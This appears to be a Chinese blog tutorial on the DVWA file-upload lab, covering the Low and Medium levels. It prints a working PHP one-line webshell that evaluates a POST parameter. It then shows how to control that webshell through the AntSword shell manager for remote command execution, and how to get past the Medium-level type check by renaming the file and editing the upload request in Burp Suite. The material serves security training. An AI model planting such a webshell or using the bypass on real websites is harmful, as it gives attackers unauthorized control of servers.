当前位置: 首页 > news >正文

【DVWA】——File Upload(文件上传)

📖 前言:文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。


目录

  • 🕒 1. Low
  • 🕒 2. Medium

🕒 1. Low

满足这三个条件,攻击者就能够成功入侵

  • 木马上传成功,未被杀;
  • 知道木马的路径在哪;
  • 上传的木马能正常运行(解析)。

没有任何限制,所以直接上传一句简短代码(一句话木马)即可

<?php @eval($_POST['csb']);
echo "vulnerable";
?>

在这里插入图片描述
在这里插入图片描述

接下来需要用到一款Shell控制工具——中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。简而言之,中国蚁剑是一款的shell控制端软件。

🔎 中国蚁剑

第一次安装项目需要先初始化,我们解压到下面的文件夹

AntSword-Loader-v4.0.3-win32-x64\antSword-master

初始化完成后打开,首先右键空白处,点击添加数据

在这里插入图片描述
将上传的URL添加进去

http://192.168.31.57:8080/hackable/uploads/webshell.php

在这里插入图片描述

密码就是刚才后门的密码:csb,测试连接成功后即可添加

在这里插入图片描述

双击该URL地址,可以看到起其目录文件信息,随后右键在此处打开终端

在这里插入图片描述

在这里插入图片描述

此时就可以随意输入指令,实现远控了。

🕒 2. Medium

在这里插入图片描述
可以看到,靶场对文件类型做了限制,只允许上传png、jpeg

此时我们可以把一句话木马改为png后缀

在这里插入图片描述

然后使用BP抓包,将文件后缀改成php

在这里插入图片描述

在这里插入图片描述
使用webshell连接同上。


OK,以上就是本期知识点“File Upload(文件上传)”的知识啦~~ ,感谢友友们的阅读。后续还会继续更新,欢迎持续关注哟📌~
💫如果有错误❌,欢迎批评指正呀👀~让我们一起相互进步🚀
🎉如果觉得收获满满,可以点点赞👍支持一下哟~

❗ 转载请注明出处
作者:HinsCoder
博客链接:🔎 作者博客主页


http://www.mrgr.cn/news/27712.html

相关文章:

  • 蓝桥杯——数组
  • 《动手学深度学习》中d2l库的安装以及问题解决
  • python os.path.dirname(path) 详解
  • FlinkSql读取kafka数据流的方法(scala)
  • 释放 PWA 的力量:2024 年的现代Web应用|React + TypeScript 示例
  • 深入理解接口测试:实用指南与最佳实践5.0(五)
  • 【原创 架构设计】多级缓存的应用、常见问题与解决方式
  • 如何使用myabtis log plugin插件展示出数据库查询语句
  • python中实用的数组操作技巧i奥,都在这里了
  • JavaScript web API part3
  • 异常冲突行为和危险识别系统源码分享
  • 数论-快速幂
  • IP纯净度对跨境电商有哪些影响
  • Google提出 Speculative RAG:通过草稿机制增强检索增强生成
  • 如何利用UML进行领域建模
  • 05_Python数据类型_列表的相关运算
  • 网络原理2-网络层与数据链路层
  • 日系编曲:电吉他音色制作 拾音器选择 电吉他音色制作逻辑 音箱分类 效果器单块分类
  • 深入理解Python中的魔法参数 *args 和 **kwargs
  • C# 反射之动态生成dll/exe
  • CODESYS标准化编程之输入输出映射
  • 通信工程学习:什么是接入网(AN)中的CF核心功能
  • 电子电气架构——中央计算的软件定义汽车架构
  • 台风,也称为热带气旋,是一种在热带海洋上形成的强烈风暴系统。台风的形成需要满足以下几个条件:
  • Cyber Weekly #24
  • quartz 搭配SQL Server时出现deadlock的解决方案